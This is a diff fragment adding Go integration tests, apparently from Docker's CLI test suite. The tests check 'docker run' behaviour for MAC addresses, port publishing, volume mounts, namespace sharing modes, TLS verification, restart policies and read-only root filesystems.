+		out, _ = dockerCmd(c, "run", "-i", "--rm", fmt.Sprintf("--mac-address=%s", mac), "busybox", "/bin/sh", "-c", "ip link show eth0 | tail -1 | awk '{print $2}'")
+	}
+
+	actualMac := strings.TrimSpace(out)
+	if actualMac != mac {
+		c.Fatalf("Set MAC address with --mac-address failed. The container has an incorrect MAC address: %q, expected: %q", actualMac, mac)
+	}
+}
+
+func (s *DockerSuite) TestRunInspectMacAddress(c *check.C) {
+	// TODO Windows. Network settings are not propagated back to inspect.
+	testRequires(c, DaemonIsLinux)
+	mac := "12:34:56:78:9a:bc"
+	out, _ := dockerCmd(c, "run", "-d", "--mac-address="+mac, "busybox", "top")
+
+	id := strings.TrimSpace(out)
+	inspectedMac := inspectField(c, id, "NetworkSettings.Networks.bridge.MacAddress")
+	if inspectedMac != mac {
+		c.Fatalf("docker inspect outputs wrong MAC address: %q, should be: %q", inspectedMac, mac)
+	}
+}
+
+// test docker run use an invalid mac address
+func (s *DockerSuite) TestRunWithInvalidMacAddress(c *check.C) {
+	out, _, err := dockerCmdWithError("run", "--mac-address", "92:d0:c6:0a:29", "busybox")
+	//use an invalid mac address should with an error out
+	if err == nil || !strings.Contains(out, "is not a valid mac address") {
+		c.Fatalf("run with an invalid --mac-address should with error out")
+	}
+}
+
+func (s *DockerSuite) TestRunDeallocatePortOnMissingIptablesRule(c *check.C) {
+	// TODO Windows. Network settings are not propagated back to inspect.
+	testRequires(c, SameHostDaemon, DaemonIsLinux)
+
+	out, _ := dockerCmd(c, "run", "-d", "-p", "23:23", "busybox", "top")
+
+	id := strings.TrimSpace(out)
+	ip := inspectField(c, id, "NetworkSettings.Networks.bridge.IPAddress")
+	iptCmd := exec.Command("iptables", "-D", "DOCKER", "-d", fmt.Sprintf("%s/32", ip),
+		"!", "-i", "docker0", "-o", "docker0", "-p", "tcp", "-m", "tcp", "--dport", "23", "-j", "ACCEPT")
+	out, _, err := runCommandWithOutput(iptCmd)
+	if err != nil {
+		c.Fatal(err, out)
+	}
+	if err := deleteContainer(id); err != nil {
+		c.Fatal(err)
+	}
+
+	dockerCmd(c, "run", "-d", "-p", "23:23", "busybox", "top")
+}
+
+func (s *DockerSuite) TestRunPortInUse(c *check.C) {
+	// TODO Windows. The duplicate NAT message returned by Windows will be
+	// changing as is currently completely undecipherable. Does need modifying
+	// to run sh rather than top though as top isn't in Windows busybox.
+	testRequires(c, SameHostDaemon, DaemonIsLinux)
+
+	port := "1234"
+	dockerCmd(c, "run", "-d", "-p", port+":80", "busybox", "top")
+
+	out, _, err := dockerCmdWithError("run", "-d", "-p", port+":80", "busybox", "top")
+	if err == nil {
+		c.Fatalf("Binding on used port must fail")
+	}
+	if !strings.Contains(out, "port is already allocated") {
+		c.Fatalf("Out must be about \"port is already allocated\", got %s", out)
+	}
+}
+
+// https://github.com/docker/docker/issues/12148
+func (s *DockerSuite) TestRunAllocatePortInReservedRange(c *check.C) {
+	// TODO Windows. -P is not yet supported
+	testRequires(c, DaemonIsLinux)
+	// allocate a dynamic port to get the most recent
+	out, _ := dockerCmd(c, "run", "-d", "-P", "-p", "80", "busybox", "top")
+
+	id := strings.TrimSpace(out)
+	out, _ = dockerCmd(c, "port", id, "80")
+
+	strPort := strings.Split(strings.TrimSpace(out), ":")[1]
+	port, err := strconv.ParseInt(strPort, 10, 64)
+	if err != nil {
+		c.Fatalf("invalid port, got: %s, error: %s", strPort, err)
+	}
+
+	// allocate a static port and a dynamic port together, with static port
+	// takes the next recent port in dynamic port range.
+	dockerCmd(c, "run", "-d", "-P", "-p", "80", "-p", fmt.Sprintf("%d:8080", port+1), "busybox", "top")
+}
+
+// Regression test for #7792
+func (s *DockerSuite) TestRunMountOrdering(c *check.C) {
+	// TODO Windows: Post TP5. Updated, but Windows does not support nested mounts currently.
+	testRequires(c, SameHostDaemon, DaemonIsLinux, NotUserNamespace)
+	prefix, _ := getPrefixAndSlashFromDaemonPlatform()
+
+	tmpDir, err := ioutil.TempDir("", "docker_nested_mount_test")
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer os.RemoveAll(tmpDir)
+
+	tmpDir2, err := ioutil.TempDir("", "docker_nested_mount_test2")
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer os.RemoveAll(tmpDir2)
+
+	// Create a temporary tmpfs mounc.
+	fooDir := filepath.Join(tmpDir, "foo")
+	if err := os.MkdirAll(filepath.Join(tmpDir, "foo"), 0755); err != nil {
+		c.Fatalf("failed to mkdir at %s - %s", fooDir, err)
+	}
+
+	if err := ioutil.WriteFile(fmt.Sprintf("%s/touch-me", fooDir), []byte{}, 0644); err != nil {
+		c.Fatal(err)
+	}
+
+	if err := ioutil.WriteFile(fmt.Sprintf("%s/touch-me", tmpDir), []byte{}, 0644); err != nil {
+		c.Fatal(err)
+	}
+
+	if err := ioutil.WriteFile(fmt.Sprintf("%s/touch-me", tmpDir2), []byte{}, 0644); err != nil {
+		c.Fatal(err)
+	}
+
+	dockerCmd(c, "run",
+		"-v", fmt.Sprintf("%s:"+prefix+"/tmp", tmpDir),
+		"-v", fmt.Sprintf("%s:"+prefix+"/tmp/foo", fooDir),
+		"-v", fmt.Sprintf("%s:"+prefix+"/tmp/tmp2", tmpDir2),
+		"-v", fmt.Sprintf("%s:"+prefix+"/tmp/tmp2/foo", fooDir),
+		"busybox:latest", "sh", "-c",
+		"ls "+prefix+"/tmp/touch-me && ls "+prefix+"/tmp/foo/touch-me && ls "+prefix+"/tmp/tmp2/touch-me && ls "+prefix+"/tmp/tmp2/foo/touch-me")
+}
+
+// Regression test for https://github.com/docker/docker/issues/8259
+func (s *DockerSuite) TestRunReuseBindVolumeThatIsSymlink(c *check.C) {
+	// Not applicable on Windows as Windows does not support volumes
+	testRequires(c, SameHostDaemon, DaemonIsLinux, NotUserNamespace)
+	prefix, _ := getPrefixAndSlashFromDaemonPlatform()
+
+	tmpDir, err := ioutil.TempDir(os.TempDir(), "testlink")
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer os.RemoveAll(tmpDir)
+
+	linkPath := os.TempDir() + "/testlink2"
+	if err := os.Symlink(tmpDir, linkPath); err != nil {
+		c.Fatal(err)
+	}
+	defer os.RemoveAll(linkPath)
+
+	// Create first container
+	dockerCmd(c, "run", "-v", fmt.Sprintf("%s:"+prefix+"/tmp/test", linkPath), "busybox", "ls", prefix+"/tmp/test")
+
+	// Create second container with same symlinked path
+	// This will fail if the referenced issue is hit with a "Volume exists" error
+	dockerCmd(c, "run", "-v", fmt.Sprintf("%s:"+prefix+"/tmp/test", linkPath), "busybox", "ls", prefix+"/tmp/test")
+}
+
+//GH#10604: Test an "/etc" volume doesn't overlay special bind mounts in container
+func (s *DockerSuite) TestRunCreateVolumeEtc(c *check.C) {
+	// While Windows supports volumes, it does not support --add-host hence
+	// this test is not applicable on Windows.
+	testRequires(c, DaemonIsLinux)
+	out, _ := dockerCmd(c, "run", "--dns=127.0.0.1", "-v", "/etc", "busybox", "cat", "/etc/resolv.conf")
+	if !strings.Contains(out, "nameserver 127.0.0.1") {
+		c.Fatal("/etc volume mount hides /etc/resolv.conf")
+	}
+
+	out, _ = dockerCmd(c, "run", "-h=test123", "-v", "/etc", "busybox", "cat", "/etc/hostname")
+	if !strings.Contains(out, "test123") {
+		c.Fatal("/etc volume mount hides /etc/hostname")
+	}
+
+	out, _ = dockerCmd(c, "run", "--add-host=test:192.168.0.1", "-v", "/etc", "busybox", "cat", "/etc/hosts")
+	out = strings.Replace(out, "\n", " ", -1)
+	if !strings.Contains(out, "192.168.0.1\ttest") || !strings.Contains(out, "127.0.0.1\tlocalhost") {
+		c.Fatal("/etc volume mount hides /etc/hosts")
+	}
+}
+
+func (s *DockerSuite) TestVolumesNoCopyData(c *check.C) {
+	// TODO Windows (Post RS1). Windows does not support volumes which
+	// are pre-populated such as is built in the dockerfile used in this test.
+	testRequires(c, DaemonIsLinux)
+	prefix, slash := getPrefixAndSlashFromDaemonPlatform()
+	if _, err := buildImage("dataimage",
+		`FROM busybox
+		RUN ["mkdir", "-p", "/foo"]
+		RUN ["touch", "/foo/bar"]`,
+		true); err != nil {
+		c.Fatal(err)
+	}
+
+	dockerCmd(c, "run", "--name", "test", "-v", prefix+slash+"foo", "busybox")
+
+	if out, _, err := dockerCmdWithError("run", "--volumes-from", "test", "dataimage", "ls", "-lh", "/foo/bar"); err == nil || !strings.Contains(out, "No such file or directory") {
+		c.Fatalf("Data was copied on volumes-from but shouldn't be:\n%q", out)
+	}
+
+	tmpDir := randomTmpDirPath("docker_test_bind_mount_copy_data", daemonPlatform)
+	if out, _, err := dockerCmdWithError("run", "-v", tmpDir+":/foo", "dataimage", "ls", "-lh", "/foo/bar"); err == nil || !strings.Contains(out, "No such file or directory") {
+		c.Fatalf("Data was copied on bind-mount but shouldn't be:\n%q", out)
+	}
+}
+
+func (s *DockerSuite) TestRunNoOutputFromPullInStdout(c *check.C) {
+	// just run with unknown image
+	cmd := exec.Command(dockerBinary, "run", "asdfsg")
+	stdout := bytes.NewBuffer(nil)
+	cmd.Stdout = stdout
+	if err := cmd.Run(); err == nil {
+		c.Fatal("Run with unknown image should fail")
+	}
+	if stdout.Len() != 0 {
+		c.Fatalf("Stdout contains output from pull: %s", stdout)
+	}
+}
+
+func (s *DockerSuite) TestRunVolumesCleanPaths(c *check.C) {
+	testRequires(c, SameHostDaemon)
+	prefix, slash := getPrefixAndSlashFromDaemonPlatform()
+	if _, err := buildImage("run_volumes_clean_paths",
+		`FROM busybox
+		VOLUME `+prefix+`/foo/`,
+		true); err != nil {
+		c.Fatal(err)
+	}
+
+	dockerCmd(c, "run", "-v", prefix+"/foo", "-v", prefix+"/bar/", "--name", "dark_helmet", "run_volumes_clean_paths")
+
+	out, err := inspectMountSourceField("dark_helmet", prefix+slash+"foo"+slash)
+	if err != errMountNotFound {
+		c.Fatalf("Found unexpected volume entry for '%s/foo/' in volumes\n%q", prefix, out)
+	}
+
+	out, err = inspectMountSourceField("dark_helmet", prefix+slash+`foo`)
+	c.Assert(err, check.IsNil)
+	if !strings.Contains(strings.ToLower(out), strings.ToLower(volumesConfigPath)) {
+		c.Fatalf("Volume was not defined for %s/foo\n%q", prefix, out)
+	}
+
+	out, err = inspectMountSourceField("dark_helmet", prefix+slash+"bar"+slash)
+	if err != errMountNotFound {
+		c.Fatalf("Found unexpected volume entry for '%s/bar/' in volumes\n%q", prefix, out)
+	}
+
+	out, err = inspectMountSourceField("dark_helmet", prefix+slash+"bar")
+	c.Assert(err, check.IsNil)
+	if !strings.Contains(strings.ToLower(out), strings.ToLower(volumesConfigPath)) {
+		c.Fatalf("Volume was not defined for %s/bar\n%q", prefix, out)
+	}
+}
+
+// Regression test for #3631
+func (s *DockerSuite) TestRunSlowStdoutConsumer(c *check.C) {
+	// TODO Windows: This should be able to run on Windows if can find an
+	// alternate to /dev/zero and /dev/stdout.
+	testRequires(c, DaemonIsLinux)
+	cont := exec.Command(dockerBinary, "run", "--rm", "busybox", "/bin/sh", "-c", "dd if=/dev/zero of=/dev/stdout bs=1024 count=2000 | catv")
+
+	stdout, err := cont.StdoutPipe()
+	if err != nil {
+		c.Fatal(err)
+	}
+
+	if err := cont.Start(); err != nil {
+		c.Fatal(err)
+	}
+	n, err := consumeWithSpeed(stdout, 10000, 5*time.Millisecond, nil)
+	if err != nil {
+		c.Fatal(err)
+	}
+
+	expected := 2 * 1024 * 2000
+	if n != expected {
+		c.Fatalf("Expected %d, got %d", expected, n)
+	}
+}
+
+func (s *DockerSuite) TestRunAllowPortRangeThroughExpose(c *check.C) {
+	// TODO Windows: -P is not currently supported. Also network
+	// settings are not propagated back.
+	testRequires(c, DaemonIsLinux)
+	out, _ := dockerCmd(c, "run", "-d", "--expose", "3000-3003", "-P", "busybox", "top")
+
+	id := strings.TrimSpace(out)
+	portstr := inspectFieldJSON(c, id, "NetworkSettings.Ports")
+	var ports nat.PortMap
+	if err := json.Unmarshal([]byte(portstr), &ports); err != nil {
+		c.Fatal(err)
+	}
+	for port, binding := range ports {
+		portnum, _ := strconv.Atoi(strings.Split(string(port), "/")[0])
+		if portnum < 3000 || portnum > 3003 {
+			c.Fatalf("Port %d is out of range ", portnum)
+		}
+		if binding == nil || len(binding) != 1 || len(binding[0].HostPort) == 0 {
+			c.Fatalf("Port is not mapped for the port %s", port)
+		}
+	}
+}
+
+func (s *DockerSuite) TestRunExposePort(c *check.C) {
+	out, _, err := dockerCmdWithError("run", "--expose", "80000", "busybox")
+	c.Assert(err, checker.NotNil, check.Commentf("--expose with an invalid port should error out"))
+	c.Assert(out, checker.Contains, "invalid range format for --expose")
+}
+
+func (s *DockerSuite) TestRunModeIpcHost(c *check.C) {
+	// Not applicable on Windows as uses Unix-specific capabilities
+	testRequires(c, SameHostDaemon, DaemonIsLinux, NotUserNamespace)
+
+	hostIpc, err := os.Readlink("/proc/1/ns/ipc")
+	if err != nil {
+		c.Fatal(err)
+	}
+
+	out, _ := dockerCmd(c, "run", "--ipc=host", "busybox", "readlink", "/proc/self/ns/ipc")
+	out = strings.Trim(out, "\n")
+	if hostIpc != out {
+		c.Fatalf("IPC different with --ipc=host %s != %s\n", hostIpc, out)
+	}
+
+	out, _ = dockerCmd(c, "run", "busybox", "readlink", "/proc/self/ns/ipc")
+	out = strings.Trim(out, "\n")
+	if hostIpc == out {
+		c.Fatalf("IPC should be different without --ipc=host %s == %s\n", hostIpc, out)
+	}
+}
+
+func (s *DockerSuite) TestRunModeIpcContainer(c *check.C) {
+	// Not applicable on Windows as uses Unix-specific capabilities
+	testRequires(c, SameHostDaemon, DaemonIsLinux)
+
+	out, _ := dockerCmd(c, "run", "-d", "busybox", "sh", "-c", "echo -n test > /dev/shm/test && touch /dev/mqueue/toto && top")
+
+	id := strings.TrimSpace(out)
+	state := inspectField(c, id, "State.Running")
+	if state != "true" {
+		c.Fatal("Container state is 'not running'")
+	}
+	pid1 := inspectField(c, id, "State.Pid")
+
+	parentContainerIpc, err := os.Readlink(fmt.Sprintf("/proc/%s/ns/ipc", pid1))
+	if err != nil {
+		c.Fatal(err)
+	}
+
+	out, _ = dockerCmd(c, "run", fmt.Sprintf("--ipc=container:%s", id), "busybox", "readlink", "/proc/self/ns/ipc")
+	out = strings.Trim(out, "\n")
+	if parentContainerIpc != out {
+		c.Fatalf("IPC different with --ipc=container:%s %s != %s\n", id, parentContainerIpc, out)
+	}
+
+	catOutput, _ := dockerCmd(c, "run", fmt.Sprintf("--ipc=container:%s", id), "busybox", "cat", "/dev/shm/test")
+	if catOutput != "test" {
+		c.Fatalf("Output of /dev/shm/test expected test but found: %s", catOutput)
+	}
+
+	// check that /dev/mqueue is actually of mqueue type
+	grepOutput, _ := dockerCmd(c, "run", fmt.Sprintf("--ipc=container:%s", id), "busybox", "grep", "/dev/mqueue", "/proc/mounts")
+	if !strings.HasPrefix(grepOutput, "mqueue /dev/mqueue mqueue rw") {
+		c.Fatalf("Output of 'grep /proc/mounts' expected 'mqueue /dev/mqueue mqueue rw' but found: %s", grepOutput)
+	}
+
+	lsOutput, _ := dockerCmd(c, "run", fmt.Sprintf("--ipc=container:%s", id), "busybox", "ls", "/dev/mqueue")
+	lsOutput = strings.Trim(lsOutput, "\n")
+	if lsOutput != "toto" {
+		c.Fatalf("Output of 'ls /dev/mqueue' expected 'toto' but found: %s", lsOutput)
+	}
+}
+
+func (s *DockerSuite) TestRunModeIpcContainerNotExists(c *check.C) {
+	// Not applicable on Windows as uses Unix-specific capabilities
+	testRequires(c, DaemonIsLinux)
+	out, _, err := dockerCmdWithError("run", "-d", "--ipc", "container:abcd1234", "busybox", "top")
+	if !strings.Contains(out, "abcd1234") || err == nil {
+		c.Fatalf("run IPC from a non exists container should with correct error out")
+	}
+}
+
+func (s *DockerSuite) TestRunModeIpcContainerNotRunning(c *check.C) {
+	// Not applicable on Windows as uses Unix-specific capabilities
+	testRequires(c, SameHostDaemon, DaemonIsLinux)
+
+	out, _ := dockerCmd(c, "create", "busybox")
+
+	id := strings.TrimSpace(out)
+	out, _, err := dockerCmdWithError("run", fmt.Sprintf("--ipc=container:%s", id), "busybox")
+	if err == nil {
+		c.Fatalf("Run container with ipc mode container should fail with non running container: %s\n%s", out, err)
+	}
+}
+
+func (s *DockerSuite) TestRunModePIDContainer(c *check.C) {
+	// Not applicable on Windows as uses Unix-specific capabilities
+	testRequires(c, SameHostDaemon, DaemonIsLinux)
+
+	out, _ := dockerCmd(c, "run", "-d", "busybox", "sh", "-c", "top")
+
+	id := strings.TrimSpace(out)
+	state := inspectField(c, id, "State.Running")
+	if state != "true" {
+		c.Fatal("Container state is 'not running'")
+	}
+	pid1 := inspectField(c, id, "State.Pid")
+
+	parentContainerPid, err := os.Readlink(fmt.Sprintf("/proc/%s/ns/pid", pid1))
+	if err != nil {
+		c.Fatal(err)
+	}
+
+	out, _ = dockerCmd(c, "run", fmt.Sprintf("--pid=container:%s", id), "busybox", "readlink", "/proc/self/ns/pid")
+	out = strings.Trim(out, "\n")
+	if parentContainerPid != out {
+		c.Fatalf("PID different with --pid=container:%s %s != %s\n", id, parentContainerPid, out)
+	}
+}
+
+func (s *DockerSuite) TestRunModePIDContainerNotExists(c *check.C) {
+	// Not applicable on Windows as uses Unix-specific capabilities
+	testRequires(c, DaemonIsLinux)
+	out, _, err := dockerCmdWithError("run", "-d", "--pid", "container:abcd1234", "busybox", "top")
+	if !strings.Contains(out, "abcd1234") || err == nil {
+		c.Fatalf("run PID from a non exists container should with correct error out")
+	}
+}
+
+func (s *DockerSuite) TestRunModePIDContainerNotRunning(c *check.C) {
+	// Not applicable on Windows as uses Unix-specific capabilities
+	testRequires(c, SameHostDaemon, DaemonIsLinux)
+
+	out, _ := dockerCmd(c, "create", "busybox")
+
+	id := strings.TrimSpace(out)
+	out, _, err := dockerCmdWithError("run", fmt.Sprintf("--pid=container:%s", id), "busybox")
+	if err == nil {
+		c.Fatalf("Run container with pid mode container should fail with non running container: %s\n%s", out, err)
+	}
+}
+
+func (s *DockerSuite) TestRunMountShmMqueueFromHost(c *check.C) {
+	// Not applicable on Windows as uses Unix-specific capabilities
+	testRequires(c, SameHostDaemon, DaemonIsLinux, NotUserNamespace)
+
+	dockerCmd(c, "run", "-d", "--name", "shmfromhost", "-v", "/dev/shm:/dev/shm", "-v", "/dev/mqueue:/dev/mqueue", "busybox", "sh", "-c", "echo -n test > /dev/shm/test && touch /dev/mqueue/toto && top")
+	defer os.Remove("/dev/mqueue/toto")
+	defer os.Remove("/dev/shm/test")
+	volPath, err := inspectMountSourceField("shmfromhost", "/dev/shm")
+	c.Assert(err, checker.IsNil)
+	if volPath != "/dev/shm" {
+		c.Fatalf("volumePath should have been /dev/shm, was %s", volPath)
+	}
+
+	out, _ := dockerCmd(c, "run", "--name", "ipchost", "--ipc", "host", "busybox", "cat", "/dev/shm/test")
+	if out != "test" {
+		c.Fatalf("Output of /dev/shm/test expected test but found: %s", out)
+	}
+
+	// Check that the mq was created
+	if _, err := os.Stat("/dev/mqueue/toto"); err != nil {
+		c.Fatalf("Failed to confirm '/dev/mqueue/toto' presence on host: %s", err.Error())
+	}
+}
+
+func (s *DockerSuite) TestContainerNetworkMode(c *check.C) {
+	// Not applicable on Windows as uses Unix-specific capabilities
+	testRequires(c, SameHostDaemon, DaemonIsLinux)
+
+	out, _ := dockerCmd(c, "run", "-d", "busybox", "top")
+	id := strings.TrimSpace(out)
+	c.Assert(waitRun(id), check.IsNil)
+	pid1 := inspectField(c, id, "State.Pid")
+
+	parentContainerNet, err := os.Readlink(fmt.Sprintf("/proc/%s/ns/net", pid1))
+	if err != nil {
+		c.Fatal(err)
+	}
+
+	out, _ = dockerCmd(c, "run", fmt.Sprintf("--net=container:%s", id), "busybox", "readlink", "/proc/self/ns/net")
+	out = strings.Trim(out, "\n")
+	if parentContainerNet != out {
+		c.Fatalf("NET different with --net=container:%s %s != %s\n", id, parentContainerNet, out)
+	}
+}
+
+func (s *DockerSuite) TestRunModePIDHost(c *check.C) {
+	// Not applicable on Windows as uses Unix-specific capabilities
+	testRequires(c, SameHostDaemon, DaemonIsLinux, NotUserNamespace)
+
+	hostPid, err := os.Readlink("/proc/1/ns/pid")
+	if err != nil {
+		c.Fatal(err)
+	}
+
+	out, _ := dockerCmd(c, "run", "--pid=host", "busybox", "readlink", "/proc/self/ns/pid")
+	out = strings.Trim(out, "\n")
+	if hostPid != out {
+		c.Fatalf("PID different with --pid=host %s != %s\n", hostPid, out)
+	}
+
+	out, _ = dockerCmd(c, "run", "busybox", "readlink", "/proc/self/ns/pid")
+	out = strings.Trim(out, "\n")
+	if hostPid == out {
+		c.Fatalf("PID should be different without --pid=host %s == %s\n", hostPid, out)
+	}
+}
+
+func (s *DockerSuite) TestRunModeUTSHost(c *check.C) {
+	// Not applicable on Windows as uses Unix-specific capabilities
+	testRequires(c, SameHostDaemon, DaemonIsLinux)
+
+	hostUTS, err := os.Readlink("/proc/1/ns/uts")
+	if err != nil {
+		c.Fatal(err)
+	}
+
+	out, _ := dockerCmd(c, "run", "--uts=host", "busybox", "readlink", "/proc/self/ns/uts")
+	out = strings.Trim(out, "\n")
+	if hostUTS != out {
+		c.Fatalf("UTS different with --uts=host %s != %s\n", hostUTS, out)
+	}
+
+	out, _ = dockerCmd(c, "run", "busybox", "readlink", "/proc/self/ns/uts")
+	out = strings.Trim(out, "\n")
+	if hostUTS == out {
+		c.Fatalf("UTS should be different without --uts=host %s == %s\n", hostUTS, out)
+	}
+
+	out, _ = dockerCmdWithFail(c, "run", "-h=name", "--uts=host", "busybox", "ps")
+	c.Assert(out, checker.Contains, runconfig.ErrConflictUTSHostname.Error())
+}
+
+func (s *DockerSuite) TestRunTLSVerify(c *check.C) {
+	// Remote daemons use TLS and this test is not applicable when TLS is required.
+	testRequires(c, SameHostDaemon)
+	if out, code, err := dockerCmdWithError("ps"); err != nil || code != 0 {
+		c.Fatalf("Should have worked: %v:\n%v", err, out)
+	}
+
+	// Regardless of whether we specify true or false we need to
+	// test to make sure tls is turned on if --tlsverify is specified at all
+	result := dockerCmdWithResult("--tlsverify=false", "ps")
+	result.Assert(c, icmd.Expected{ExitCode: 1, Err: "error during connect"})
+
+	result = dockerCmdWithResult("--tlsverify=true", "ps")
+	result.Assert(c, icmd.Expected{ExitCode: 1, Err: "cert"})
+}
+
+func (s *DockerSuite) TestRunPortFromDockerRangeInUse(c *check.C) {
+	// TODO Windows. Once moved to libnetwork/CNM, this may be able to be
+	// re-instated.
+	testRequires(c, DaemonIsLinux)
+	// first find allocator current position
+	out, _ := dockerCmd(c, "run", "-d", "-p", ":80", "busybox", "top")
+
+	id := strings.TrimSpace(out)
+	out, _ = dockerCmd(c, "port", id)
+
+	out = strings.TrimSpace(out)
+	if out == "" {
+		c.Fatal("docker port command output is empty")
+	}
+	out = strings.Split(out, ":")[1]
+	lastPort, err := strconv.Atoi(out)
+	if err != nil {
+		c.Fatal(err)
+	}
+	port := lastPort + 1
+	l, err := net.Listen("tcp", ":"+strconv.Itoa(port))
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer l.Close()
+
+	out, _ = dockerCmd(c, "run", "-d", "-p", ":80", "busybox", "top")
+
+	id = strings.TrimSpace(out)
+	dockerCmd(c, "port", id)
+}
+
+func (s *DockerSuite) TestRunTTYWithPipe(c *check.C) {
+	errChan := make(chan error)
+	go func() {
+		defer close(errChan)
+
+		cmd := exec.Command(dockerBinary, "run", "-ti", "busybox", "true")
+		if _, err := cmd.StdinPipe(); err != nil {
+			errChan <- err
+			return
+		}
+
+		expected := "the input device is not a TTY"
+		if runtime.GOOS == "windows" {
+			expected += ".  If you are using mintty, try prefixing the command with 'winpty'"
+		}
+		if out, _, err := runCommandWithOutput(cmd); err == nil {
+			errChan <- fmt.Errorf("run should have failed")
+			return
+		} else if !strings.Contains(out, expected) {
+			errChan <- fmt.Errorf("run failed with error %q: expected %q", out, expected)
+			return
+		}
+	}()
+
+	select {
+	case err := <-errChan:
+		c.Assert(err, check.IsNil)
+	case <-time.After(30 * time.Second):
+		c.Fatal("container is running but should have failed")
+	}
+}
+
+func (s *DockerSuite) TestRunNonLocalMacAddress(c *check.C) {
+	addr := "00:16:3E:08:00:50"
+	args := []string{"run", "--mac-address", addr}
+	expected := addr
+
+	if daemonPlatform != "windows" {
+		args = append(args, "busybox", "ifconfig")
+	} else {
+		args = append(args, WindowsBaseImage, "ipconfig", "/all")
+		expected = strings.Replace(strings.ToUpper(addr), ":", "-", -1)
+	}
+
+	if out, _ := dockerCmd(c, args...); !strings.Contains(out, expected) {
+		c.Fatalf("Output should have contained %q: %s", expected, out)
+	}
+}
+
+func (s *DockerSuite) TestRunNetHost(c *check.C) {
+	// Not applicable on Windows as uses Unix-specific capabilities
+	testRequires(c, SameHostDaemon, DaemonIsLinux, NotUserNamespace)
+
+	hostNet, err := os.Readlink("/proc/1/ns/net")
+	if err != nil {
+		c.Fatal(err)
+	}
+
+	out, _ := dockerCmd(c, "run", "--net=host", "busybox", "readlink", "/proc/self/ns/net")
+	out = strings.Trim(out, "\n")
+	if hostNet != out {
+		c.Fatalf("Net namespace different with --net=host %s != %s\n", hostNet, out)
+	}
+
+	out, _ = dockerCmd(c, "run", "busybox", "readlink", "/proc/self/ns/net")
+	out = strings.Trim(out, "\n")
+	if hostNet == out {
+		c.Fatalf("Net namespace should be different without --net=host %s == %s\n", hostNet, out)
+	}
+}
+
+func (s *DockerSuite) TestRunNetHostTwiceSameName(c *check.C) {
+	// TODO Windows. As Windows networking evolves and converges towards
+	// CNM, this test may be possible to enable on Windows.
+	testRequires(c, SameHostDaemon, DaemonIsLinux, NotUserNamespace)
+
+	dockerCmd(c, "run", "--rm", "--name=thost", "--net=host", "busybox", "true")
+	dockerCmd(c, "run", "--rm", "--name=thost", "--net=host", "busybox", "true")
+}
+
+func (s *DockerSuite) TestRunNetContainerWhichHost(c *check.C) {
+	// Not applicable on Windows as uses Unix-specific capabilities
+	testRequires(c, SameHostDaemon, DaemonIsLinux, NotUserNamespace)
+
+	hostNet, err := os.Readlink("/proc/1/ns/net")
+	if err != nil {
+		c.Fatal(err)
+	}
+
+	dockerCmd(c, "run", "-d", "--net=host", "--name=test", "busybox", "top")
+
+	out, _ := dockerCmd(c, "run", "--net=container:test", "busybox", "readlink", "/proc/self/ns/net")
+	out = strings.Trim(out, "\n")
+	if hostNet != out {
+		c.Fatalf("Container should have host network namespace")
+	}
+}
+
+func (s *DockerSuite) TestRunAllowPortRangeThroughPublish(c *check.C) {
+	// TODO Windows. This may be possible to enable in the future. However,
+	// Windows does not currently support --expose, or populate the network
+	// settings seen through inspect.
+	testRequires(c, DaemonIsLinux)
+	out, _ := dockerCmd(c, "run", "-d", "--expose", "3000-3003", "-p", "3000-3003", "busybox", "top")
+
+	id := strings.TrimSpace(out)
+	portstr := inspectFieldJSON(c, id, "NetworkSettings.Ports")
+
+	var ports nat.PortMap
+	err := json.Unmarshal([]byte(portstr), &ports)
+	c.Assert(err, checker.IsNil, check.Commentf("failed to unmarshal: %v", portstr))
+	for port, binding := range ports {
+		portnum, _ := strconv.Atoi(strings.Split(string(port), "/")[0])
+		if portnum < 3000 || portnum > 3003 {
+			c.Fatalf("Port %d is out of range ", portnum)
+		}
+		if binding == nil || len(binding) != 1 || len(binding[0].HostPort) == 0 {
+			c.Fatal("Port is not mapped for the port "+port, out)
+		}
+	}
+}
+
+func (s *DockerSuite) TestRunSetDefaultRestartPolicy(c *check.C) {
+	runSleepingContainer(c, "--name=testrunsetdefaultrestartpolicy")
+	out := inspectField(c, "testrunsetdefaultrestartpolicy", "HostConfig.RestartPolicy.Name")
+	if out != "no" {
+		c.Fatalf("Set default restart policy failed")
+	}
+}
+
+func (s *DockerSuite) TestRunRestartMaxRetries(c *check.C) {
+	out, _ := dockerCmd(c, "run", "-d", "--restart=on-failure:3", "busybox", "false")
+	timeout := 10 * time.Second
+	if daemonPlatform == "windows" {
+		timeout = 120 * time.Second
+	}
+
+	id := strings.TrimSpace(string(out))
+	if err := waitInspect(id, "{{ .State.Restarting }} {{ .State.Running }}", "false false", timeout); err != nil {
+		c.Fatal(err)
+	}
+
+	count := inspectField(c, id, "RestartCount")
+	if count != "3" {
+		c.Fatalf("Container was restarted %s times, expected %d", count, 3)
+	}
+
+	MaximumRetryCount := inspectField(c, id, "HostConfig.RestartPolicy.MaximumRetryCount")
+	if MaximumRetryCount != "3" {
+		c.Fatalf("Container Maximum Retry Count is %s, expected %s", MaximumRetryCount, "3")
+	}
+}
+
+func (s *DockerSuite) TestRunContainerWithWritableRootfs(c *check.C) {
+	dockerCmd(c, "run", "--rm", "busybox", "touch", "/file")
+}
+
+func (s *DockerSuite) TestRunContainerWithReadonlyRootfs(c *check.C) {
+	// Not applicable on Windows which does not support --read-only
+	testRequires(c, DaemonIsLinux, UserNamespaceROMount)
+
+	testPriv := true
+	// don't test privileged mode subtest if user namespaces enabled
+	if root := os.Getenv("DOCKER_REMAP_ROOT"); root != "" {
+		testPriv = false
+	}
+	testReadOnlyFile(c, testPriv, "/file", "/etc/hosts", "/etc/resolv.conf", "/etc/hostname", "/sys/kernel", "/dev/.dont.touch.me")
+}
+
+func (s *DockerSuite) TestPermissionsPtsReadonlyRootfs(c *check.C) {
+	// Not applicable on Windows due to use of Unix specific functionality, plus
+	// the use of --read-only which is not supported.
+	testRequires(c, DaemonIsLinux, UserNamespaceROMount)
+
+	// Ensure we have not broken writing /dev/pts
+	out, status := dockerCmd(c, "run", "--read-only", "--rm", "busybox", "mount")
+	if status != 0 {
+		c.Fatal("Could not obtain mounts when checking /dev/pts mntpnt.")
+	}
+	expected := "type devpts (rw,"
+	if !strings.Contains(string(out), expected) {
+		c.Fatalf("expected output to contain %s but contains %s", expected, out)
+	}
+}
+
